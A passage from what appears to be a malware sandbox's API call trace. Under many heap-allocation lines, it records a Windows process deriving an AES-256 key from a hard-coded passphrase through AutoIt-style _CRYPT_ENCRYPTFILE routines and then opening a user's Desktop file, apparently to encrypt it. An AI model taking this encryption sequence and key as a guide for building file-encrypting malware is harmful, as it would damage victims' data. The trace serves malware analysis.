hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0134.949] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0134.950] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0134.950] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0134.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca7a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0134.951] CloseHandle (hObject=0x2a0) returned 1 [0134.951] FreeLibrary (hLibModule=0x772d0000) returned 1 [0134.951] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0134.951] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817bb4b0, ftCreationTime.dwHighDateTime=0x1d5e329, ftLastAccessTime.dwLowDateTime=0x1f1ffa10, ftLastAccessTime.dwHighDateTime=0x1d5e2f2, ftLastWriteTime.dwLowDateTime=0x1f1ffa10, ftLastWriteTime.dwHighDateTime=0x1d5e2f2, nFileSizeHigh=0x0, nFileSizeLow=0x13845, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="xvNld.ots", cAlternateFileName="")) returned 0x41ac2c0 [0134.951] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0134.951] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.951] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0134.951] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.952] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0134.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0134.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0134.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0134.952] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5250) returned 1 [0134.952] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0134.952] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.953] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0134.953] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0134.953] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0134.953] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0134.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.953] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0134.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cafd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0134.953] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0134.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0134.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0134.953] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0134.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0134.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0134.953] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.953] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0134.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cafb8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0134.954] CryptHashData (hHash=0x41ac740, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0134.954] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.954] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cae80, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0134.954] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac780) returned 1 [0134.954] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.954] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0134.954] CryptDestroyHash (hHash=0x41ac740) returned 1 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9e18 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0134.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8ab0 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0134.955] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0134.955] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0134.955] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0134.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eba98 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0134.956] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\xvnld.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0134.956] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.956] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0134.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0134.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0134.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0134.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0134.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.956] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0134.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0134.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0134.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0134.957] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0134.957] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0134.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0134.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0134.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0134.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0134.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0134.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0134.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e478 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0134.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0134.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d18 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e478 | out: hHeap=0x1780000) returned 1 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0134.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0134.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0134.958] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0134.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0134.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0134.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0134.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0134.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0134.959] 